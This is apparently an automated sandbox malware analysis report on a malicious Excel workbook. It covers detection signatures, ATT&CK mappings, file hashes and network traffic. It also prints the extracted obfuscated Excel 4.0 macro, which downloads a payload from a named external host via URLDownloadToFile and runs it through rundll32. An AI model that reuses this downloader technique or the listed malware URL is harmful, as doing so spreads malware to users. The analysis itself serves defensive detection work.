Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Heur.4923.6908
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
NaN% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382906 |
Start date: | 06.04.2021 |
Start time: | 21:02:11 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Heur.4923.6908 (renamed file extension from 6908 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
21:02:37 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.879494848476225 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70m:LqeRrW2JyW32AiHD2sTU2yF70m |
MD5: | 69B226B04223F0B0238B83974D2EA386 |
SHA1: | 9CC6B16D0DB0A90D17A4426B81499D88D86A6D36 |
SHA-256: | 768DC11780C913FD228808FF9D0C912E1ADB56CC448C8DE5C0243C54E7B34AC6 |
SHA-512: | DCAD9D4BB120204A6A6E32279C1280BFD9831826DF9E99E21ACE8530A158B174AC5C45584B5A40934F44D07E9C95AE594AF088C621BD0620041FC3B49A4D1C43 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.0244134949223245 |
Encrypted: | false |
SSDEEP: | 48:Kb6Uhj56fOgWh3cvwhzqHb6UhB6LHf+6snQvOahBMcF:Kb6EZmEqHb6Ce2p6F |
MD5: | 32026F85F5458AF52500D88C74181342 |
SHA1: | 8DD0C3CBA5315A72899EC2135E0F88F0EF86FEA5 |
SHA-256: | 6146AADF5EBB1EFE3AB3973AD286F31AF5E201DF1C73CFF1E88BFCA64202F111 |
SHA-512: | 7C6848CC4BF7453DF99B7EC45A76A2A1C0FC2755A56FD3235978361E0457D76028565008E2DF0DD582BDBF73AD44301C2F2A4F56287F4DED60C14CEDDF789B28 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.473479259150778 |
Encrypted: | false |
SSDEEP: | 12:85QHiXcLgXg/XAlCPCHaX7B8NB/vVUKUX+WnicvbwbDtZ3YilMMEpxRljK6TdJP8:85QiXK/XTr6NEYegDv3qfrNru/ |
MD5: | 8E28D7ED19E162195111288F4BAAC845 |
SHA1: | CB2FECDBF220BA4F7ACCAB9B686D04DA7A5F7EA8 |
SHA-256: | 7721E15E75EFC840BC2ABFC8C133E52FC25160C7D1921AF8D4A8F006C2400A66 |
SHA-512: | 59B73496DDB43A82036E15E499FE16D1842DC4095143BAC93129AA9D8F3100A223A3A9BB18B3344772D782639950268C4F8C9FB03D5B5402D309A4DC9E11986F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2188 |
Entropy (8bit): | 4.560543176315966 |
Encrypted: | false |
SSDEEP: | 48:8HD6/XT+N3zaHhLbHhLfQh2HD6/XT+N3zaHhLbHhLfQ/:8+/X6N3ObfQh2+/X6N3ObfQ/ |
MD5: | 7DD685413EF4D89A020109D0F6F51E52 |
SHA1: | AB9EACA8EED566B3E6CE5C911AC20CFAB4B519EF |
SHA-256: | 64BBE802CF5EDF3A618673534AE194A6DD897777E8C6BD9B8E0AAC4CAD22F8A6 |
SHA-512: | 17DFD5F663A1D8F18E3F4B6F4F25099ECAE45F7E1A8BAEB8982D1A8763A9F65D22B0D690D727C02CBE490B495022DFFEE429CD628A96649F0452E59FA826B989 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131 |
Entropy (8bit): | 4.807590888661823 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bGY6YCuscbGY6YCmM0bGY6YCv:dj60QY7QYU0QYs |
MD5: | CB194388983FF45057D1112C8A8ECD05 |
SHA1: | 932BA73D18BE24F3BE3D3BF370E344B5A4680019 |
SHA-256: | 7B4232CBF84DD4BD653C4D721A934981E65173F5032287C788F5790B6DBB867B |
SHA-512: | D69AA648D291FABB496DC5F2C1BAF1C850F51CE107938CEC13EDCECB664C3F066D945B0C5ECB06AC53D0ACC6F7B4543C698C245CF8C78C8CCCA5A30E046C4AD6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230317944430852 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSX2jTUqyF70xi5W2Y657WY657XI8rmju:G8rmjAItyzElBIL6lECbgBvP5NmuCSoJ |
MD5: | 9BCFFF4764ED600F9C98476013B7179E |
SHA1: | 3D5EC66CF26FAF7BCCC4C16644E6700B4DE01C69 |
SHA-256: | 2D39DA68CE613447388F86BBD992865CC9ED9905EA99DA1A21EF30304C7A43CB |
SHA-512: | B5EFC52059FC8E91BD100CE3F3FC67E659DBC2D96F445E5E2F51FBA12A3D4365EF9D87E11367D146CE3FF2AAEBAA937721EFE900830A63D891F21616AD75F9B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Heur.4923.xls |
File size: | 267776 |
MD5: | e56e32e50718813c2a9428de1d3ba674 |
SHA1: | 90cfd7975eadf45a34361e1a1def62ab1d81cad1 |
SHA256: | 56af77e2f4b36f94264cbb975bbea753fa5a4b2bec98a4fe8235d5ec28543fcb |
SHA512: | 8f6806518e709bcdc4f300529f1441cd16fcd274c91b4fc610966e818b25aed5edcb0b97c07d4ea060ebeef470c9ce6f67e8e6d99a6eec7c7ce0d5f1ff8c07ab |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+ |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Heur.4923.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 21:02:59.059638023 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.244443893 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.244602919 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.245107889 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 6, 2021 21:02:59.429975033 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.806935072 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 6, 2021 21:02:59.806989908 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
